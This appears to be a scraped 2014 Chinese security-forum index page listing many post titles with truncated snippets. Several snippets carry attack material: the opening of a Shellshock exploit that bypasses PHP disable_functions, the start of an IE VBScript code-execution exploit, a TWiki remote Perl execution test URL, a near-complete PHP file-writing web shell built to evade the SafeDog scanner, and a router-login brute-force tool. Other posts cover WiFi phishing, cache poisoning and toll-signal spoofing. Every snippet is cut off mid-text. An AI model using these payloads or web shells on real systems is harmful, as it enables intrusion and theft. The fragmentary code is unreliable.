android 5.0 修复了此漏洞:https://android.googlesource.com/platform/libcore/+/738c833d3
PHP Execute Command Bypass Disable_functions
PHP Execute Command Bypass Disable_functions phith0n (我也不会难过 你不要小看我) | 2014-11-18 14:09 先简单说一下php调用mail()函数的过程。 看到源码ext/mail.c 236行: char *sendmail_path = INI_STR("sendmail_path"); char
PHP 5.x - Bypass Disable Functions (via Shellshock)
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 10/31/2014 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: http://php.net # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror # Version: 5.* (tested on 5.6.2) # Tested on: Debian 7 and CentOS 5 and 6 # CVE: CVE-2014-6271 <?php function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283 if(strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(".","data"); putenv("PHP_LOL=()
Mysql 4.0利用子查询忽略字段名
Mysql 4.0利用子查询忽略字段名<转载><分享> BMa (安全技术爱好者!) | 2014-11-16 19:08 前段时间看了这篇帖子: ACCESS利用子查询
Piwigo <= v2.6.0 - Blind SQL Injection
Piwigo <= v2.6.0 - Blind SQL Injection -------------------------------------------------------------------------------- From: Manuel Garcia Cardenas <advidsec () gmail com> Date: Wed, 12 Nov 2014 09:56:22 +0100 -------------------------------------------------------------------------------- ============================================= MGC ALERT 2014-001 - Original release date: January 12, 2014 - Last revised: November 12, 2014 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 (CVSS Base Score) ============================================= I. VULNERABILITY ------------------------- Blind
【0day】win95 + ie3 - win10 + ie11 全版本IE浏览器远程代码执行漏洞
alliedve.htm //* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. https://twitter.com/yuange75 http://hi.baidu.com/yuange1975 *// <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "notepad.exe" end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0)
JSON探针—定位目标网络虚拟信息身份,利用大量三方网站cookie进行追踪
JSON探针—定位目标网络虚拟信息身份 Jacks | 2014-11-06 00:03 11月啦,放点东西出来 给wooyun的伙伴们分享下,其实这个技术已经很成熟啦.不过还是有不知道
浅谈反向代理对SEO的影响
浅谈反向代理对SEO的影响 九九 ([code]你说我是禽兽,可我连禽兽[/code]) | 2014-11-05 12:11 有做过这个反向代理的可以发下经验,这几天有个思路,
Remote Perl code execution with query string to debug TWiki plugins
影响版本: * TWiki-6.0.0 (TWikiRelease06x00x00) * TWiki-5.1.x (TWikiRelease05x01x00 to TWikiRelease05x01x04) * TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02) * TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02) * TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04) * TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02) * TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05) 测试方法: http://www.example.com/do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint("Content-Type:text/html\r\n\r\nVulnerable!")%3bexit 修复方式: twiki/lib/TWiki/Plugins.pm Patch to sanitize the 'debugenableplugins' parameter: =======( 8>< CUT )=============================================== --- TWiki/Plugins.pm.save1 2014-01-09 02:10:56.000000000 -0500 +++ TWiki/Plugins.pm 2014-10-01 20:30:36.000000000 -0400
关于lnmp目录禁止执行的绕过与正确方法
关于lnmp目录禁止执行的绕过与正确方法 phith0n (我也不会难过 你不要小看我) | 2014-11-02 17:50 # 无意中看到了这篇文章:Nginx下多站点正确限制目录php执行
讨论:搞个菠菜网站项目,成本需要多少?
搞个菠菜网站项目 成本需要多少。 Night | 2014-10-22 22:23 找人一起合作啊 [原文地址] 各种吐槽: 1# px1624 (aaaaaaaaa) | 2014-10-22 22:28 卖菠菜?如果就是展示下产品的话,直接用sae就够了。没
讨论:关于支付宝即时到账接口
关于支付宝即时到账接口 Mas | 2014-10-23 08:48 之前发了个帖子 因为看到这里有人发了一个帖子 说自己有云购源码希望找人合作 随后我也是求合作 反倒被喷了一顿 我那个帖子
python多线程暴力破解路由登陆账号密码,HTTP基础认证暴力破解
运行时请在其目录下添加 user.txt、passwd.txt 两文件。否则会报错。 程序没有加异常处理。 代码比较挫…… #coding:utf-8- import base64 import urllib2 import Queue import threading,re,sys queue = Queue.Queue() class
全自动无线入侵热点,黑客全自动WIFI钓鱼,大规模批量无线热点钓鱼
本文介绍一种工作的所有功能于一身的自动无线电攻击,没有任何互联网连接或其它外部连接或影响执行上的客户端类型的MITM攻击。 在外行人而言; 这种
浅谈黑产
首先up要说明一下,up只是因为好奇才去了解这个行业的,up不是大黑阔也不是手握无数0day的地下大牛,up只是一名学生狗。说实话up只能模
汽车设备安全问题,ETC通道缴费信号伪造,如何免费跑高速
看到大家讨论汽车的话题,不经想起ETC通道。 蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2014-09-30 10:59 众所周知,ETC通道,需要在
寻找cve-2014-6271的实例的一点思路
寻找cve-2014-6271的实例的一点思路 白非白 (这是什么(t_t))(谢感边右) | 2014-09-25 15:57 漏洞细节以及基本poc @mramydnei 已经在http://z
Fuzz中的javascript大小写特性
Fuzz中的javascript大小写特性 phith0n (我也不会难过 你不要小看我) | 2014-09-25 00:17 @瞌睡龍 说发过来,我就发到zone里给大家一起分享吧~ toUp
python 乌云账号暴力猜解工具
python 乌云账号暴力猜解工具 Rona (111) | 2014-09-24 17:19 需要预安装如下程序 1、pytesseract (可以pip install pytesseract安装) 2、Python Imaging Library (PIL)
密码学,简单的个人常用密码组合研究,做个关于密码的小调查.....
做个关于密码的小调查..... 子非海绵宝宝 (呵呵) | 2014-09-24 13:44 最近一直在研究渗透,发现密码的一些规律,想写个工具,所以想调查点东西. 关于密码最常用
可能是一种检测SQLMAP扫描的方式
可能是一种检测SQLMAP扫描的方式 MayIKissYou | 2014-09-16 16:30 最近在写识别网络扫描的规则,SQLMAP扫描制作规则的时候,发现了一点东西,分享给大家,可能是检
三种方法还原ASP.NET可逆加密内容
0x00 在进行安全测试的时候经常遇到ASP.NET平台的各类系统,它们加密手段有强有弱。有的只加密用户信息,有的则将数据库连接字串也进行了加密。以
Android app 端的 sql 注入
前言: 最近入门开始玩android的安全,但是国内研究的真的很少,国外有本牛逼的书《Android Hacker's Handbook》,写的不错,但是看着睡
一些有趣的 XSS Vector
XSS Vector #1 <script src=/?20.rs></script> URL中第二个斜杠在Internet Explorer下(测试于IE11)可被U+3031,U+3033,U+3035,U+309D
WiFi流量劫持:网站JS脚本缓存投毒!长期控制!浏览任意页面即可中毒!
WiFi流量劫持—— 浏览任意页面即可中毒! 大家都知道公共场所的Wifi安全性很差,但并不清楚究竟有多差。大多以为只要不上QQ、不登陆网站账号
某些WIFI分享软件存在缺陷可能导致电脑内文件被他人读取
某些WIFI分享软件存在缺陷可能导致电脑内文件被他人读取 我是小号 | 2014-09-01 21:32 前言: 我正在客厅摆弄小米盒子,遥控器将光标落在了“高清视频播放器”的选
cdn缓存的一些安全风险,cdn加速网络节点缓存可能导致的严重安全问题
cdn缓存的一些安全风险 xsser (十根阳具有长短!!) | 2014-08-28 14:07 cdn是介于用户终端和内容提供者之间的一种加速方式,通过选择最优的网络让用户访问内容的
php绕过安全狗检测的小马分享
php绕过安全狗检测的小马分享 zph | 2014-08-28 15:10 直接上代码: <?php $p=realpath(dirname(__FILE__)."/../").$_POST["a"]; $t=$_POST["b"]; $tt=""; for ($i=0;$i<strlen($t);$i+=2) $tt.=urldecode("%".substr($t,$i,2)); @fwrite(fopen($p,"w"),$tt); echo "success!"; ?> 分析利用&过狗: <?php $p=realpath(dirname(__FILE__)."/../").$_POST["a"]; //定义$p为根目录的物理路径+$_PO
如何入侵控制交通红绿灯?美研究人员发现劫持交通灯其实非常简单
美研究人员发现劫持交通灯其实非常简单 charles_zhang | 2014-08-26 13:58 美国密歇根大学的研究人员发现,像电影中那样接管城市交通让所有交通灯都切换到绿灯制造混乱并非遥不可
入侵 Gmail 有多难?成功率 92%
关于手机安全性的讨论并非一天两天了,而近日的一项研究表明,三大主流操作系统存在漏洞,黑客入侵应用的成功率远远高于我们的想象。 上周五,在美国高